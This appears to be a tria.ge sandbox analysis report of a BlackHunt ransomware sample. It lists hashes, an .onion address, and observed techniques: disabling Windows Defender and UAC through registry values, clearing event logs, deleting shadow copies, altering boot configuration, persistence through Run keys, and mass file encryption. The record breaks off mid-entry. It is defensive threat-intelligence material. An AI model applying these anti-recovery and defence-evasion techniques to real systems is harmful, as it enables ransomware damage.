Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
132s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
18/01/2024, 23:46
Static task
static1
Behavioral task
behavioral1
Sample
734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe
Resource
win10v2004-20231215-en
General
-
Target
734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe
-
Size
707KB
-
MD5
d38ae9ac535c3c0fd927bdad2a96cbe7
-
SHA1
f60c70f22097f00d078c98e6e3c935ebda9635fa
-
SHA256
734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2
-
SHA512
9355ad9196b1e2a90eefcf5fb5a0a45b21c10616eb919f1df29ab06fb7f35a84b81599df7d2130f1336cf18b990f6c17b06c4a89e8f81e502796ce3729dad6df
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1f81vnh:6uaTmkZJ+naie5OTamgEoKxLWWxh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 7340 fsutil.exe 6172 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 7236 wevtutil.exe 1492 wevtutil.exe 5648 wevtutil.exe 10100 wevtutil.exe 2164 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 8872 bcdedit.exe 8616 bcdedit.exe 7608 bcdedit.exe 10596 bcdedit.exe -
Renames multiple (3364) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 3932 wbadmin.exe 14124 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\J: 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened (read-only) \??\M: 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened (read-only) \??\S: 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened (read-only) \??\U: 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened (read-only) \??\K: 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened (read-only) \??\L: 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened (read-only) \??\Z: 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened (read-only) \??\V: 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\Q: 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\X: 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened (read-only) \??\H: 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\G: 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened (read-only) \??\R: 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened (read-only) \??\Y: 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened (read-only) \??\O: 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened (read-only) \??\P: 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened (read-only) \??\N: 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\W: 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened (read-only) \??\B: 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened (read-only) \??\T: 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened (read-only) \??\I: 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened (read-only) \??\A: 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened (read-only) \??\E: 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 3 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\hr-hr\ui-strings.js 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\css\#BlackHunt_ReadMe.hta 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\#BlackHunt_Private.key 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\dd_arrow_small.png 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\it-it\ui-strings.js 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pt-br\#BlackHunt_ReadMe.hta 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\cs-cz\ui-strings.js 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\root\#BlackHunt_ReadMe.txt 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\de-de\#BlackHunt_Private.key 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\fonts\LucidaBrightItalic.ttf 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-ae\#BlackHunt_ReadMe.hta 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sl-si\#BlackHunt_ReadMe.txt 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\editpdf.svg 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\nb-no\#BlackHunt_ReadMe.hta 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview2x.png 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\pt-br\#BlackHunt_ReadMe.hta 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\libs\require\#BlackHunt_Private.key 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\cs-cz\#BlackHunt_ReadMe.hta 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\WelcomeCardRdr-2x.png 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ko-kr\#BlackHunt_ReadMe.txt 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File created C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\#BlackHunt_ReadMe.txt 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\hr-hr\ui-strings.js 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File created C:\Program Files\dotnet\host\fxr\6.0.25\#BlackHunt_ReadMe.txt 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File created C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\#BlackHunt_ReadMe.hta 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\uk-ua\#BlackHunt_ReadMe.txt 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File created C:\Program Files\VideoLAN\VLC\lua\http\dialogs\#BlackHunt_ReadMe.hta 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\zh-cn\ui-strings.js 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\he-il\#BlackHunt_Private.key 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_radio_selected_18.svg 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File created C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\#BlackHunt_Private.key 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\#BlackHunt_ReadMe.hta 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\adc_logo.png 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\tr-tr\ui-strings.js 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\nl-nl\#BlackHunt_Private.key 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-gb\#BlackHunt_ReadMe.hta 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\ui-strings.js 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\themes\#BlackHunt_ReadMe.hta 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\#BlackHunt_ReadMe.hta 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sl-si\#BlackHunt_ReadMe.hta 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File created C:\Program Files\VideoLAN\VLC\locale\az\#BlackHunt_ReadMe.hta 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons_highcontrast_retina.png 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\new_icons.png 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\plugin.js 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-no-text_2x.gif 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\ja-jp\#BlackHunt_Private.key 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\he-il\#BlackHunt_Private.key 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File created C:\Program Files\VideoLAN\VLC\plugins\audio_filter\#BlackHunt_ReadMe.txt 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File created C:\Program Files\VideoLAN\VLC\skins\#BlackHunt_Private.key 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fr-ma\ui-strings.js 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-gb\ui-strings.js 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\cstm_brand_preview2x.png 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File created C:\Program Files\VideoLAN\VLC\locale\ast\#BlackHunt_Private.key 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\da-dk\#BlackHunt_Private.key 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files-select\#BlackHunt_Private.key 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File created C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\#BlackHunt_Private.key 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\cs-cz\#BlackHunt_Private.key 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\cs-cz\#BlackHunt_Private.key 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\de-de\ui-strings.js 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fr-ma\ui-strings.js 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\sl-si\#BlackHunt_ReadMe.txt 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_checkbox_unselected_18.svg 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\eu-es\#BlackHunt_Private.key 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File created C:\Program Files (x86)\Google\#BlackHunt_ReadMe.txt 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\themes\#BlackHunt_ReadMe.hta 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4884 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2652 vssadmin.exe 1072 vssadmin.exe 1128 vssadmin.exe 6420 vssadmin.exe 6440 vssadmin.exe 3340 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 9916 taskkill.exe -
Modifies registry class 9 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000_Classes\Local Settings cmd.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2740 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe Token: SeRestorePrivilege 4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe Token: SeBackupPrivilege 4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe Token: SeTakeOwnershipPrivilege 4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe Token: SeAuditPrivilege 4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe Token: SeSecurityPrivilege 4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe Token: SeIncBasePriorityPrivilege 4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe Token: SeBackupPrivilege 944 vssvc.exe Token: SeRestorePrivilege 944 vssvc.exe Token: SeAuditPrivilege 944 vssvc.exe Token: SeBackupPrivilege 6484 wbengine.exe Token: SeRestorePrivilege 6484 wbengine.exe Token: SeSecurityPrivilege 6484 wbengine.exe Token: SeSecurityPrivilege 2164 wevtutil.exe Token: SeBackupPrivilege 2164 wevtutil.exe Token: SeSecurityPrivilege 7236 wevtutil.exe Token: SeBackupPrivilege 7236 wevtutil.exe Token: SeSecurityPrivilege 1492 wevtutil.exe Token: SeBackupPrivilege 1492 wevtutil.exe Token: SeSecurityPrivilege 5648 wevtutil.exe Token: SeBackupPrivilege 5648 wevtutil.exe Token: SeSecurityPrivilege 10100 wevtutil.exe Token: SeBackupPrivilege 10100 wevtutil.exe Token: SeDebugPrivilege 9916 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4352 wrote to memory of 3320 4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe 89 PID 4352 wrote to memory of 3320 4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe 89 PID 4352 wrote to memory of 2824 4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe 170 PID 4352 wrote to memory of 2824 4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe 170 PID 4352 wrote to memory of 1104 4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe 175 PID 4352 wrote to memory of 1104 4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe 175 PID 4352 wrote to memory of 2744 4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe 173 PID 4352 wrote to memory of 2744 4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe 173 PID 4352 wrote to memory of 2408 4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe 97 PID 4352 wrote to memory of 2408 4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe 97 PID 3320 wrote to memory of 2976 3320 cmd.exe 99 PID 3320 wrote to memory of 2976 3320 cmd.exe 99 PID 2824 wrote to memory of 1324 2824 cmd.exe 100 PID 2824 wrote to memory of 1324 2824 cmd.exe 100 PID 4352 wrote to memory of 4556 4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe 101 PID 4352 wrote to memory of 4556 4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe 101 PID 1104 wrote to memory of 1132 1104 cmd.exe 103 PID 1104 wrote to memory of 1132 1104 cmd.exe 103 PID 2744 wrote to memory of 4836 2744 Conhost.exe 104 PID 2744 wrote to memory of 4836 2744 Conhost.exe 104 PID 4352 wrote to memory of 3744 4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe 183 PID 4352 wrote to memory of 3744 4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe 183 PID 4352 wrote to memory of 4304 4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe 107 PID 4352 wrote to memory of 4304 4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe 107 PID 2408 wrote to memory of 4412 2408 cmd.exe 109 PID 2408 wrote to memory of 4412 2408 cmd.exe 109 PID 4352 wrote to memory of 1396 4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe 110 PID 4352 wrote to memory of 1396 4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe 110 PID 4556 wrote to memory of 656 4556 cmd.exe 112 PID 4556 wrote to memory of 656 4556 cmd.exe 112 PID 4352 wrote to memory of 1628 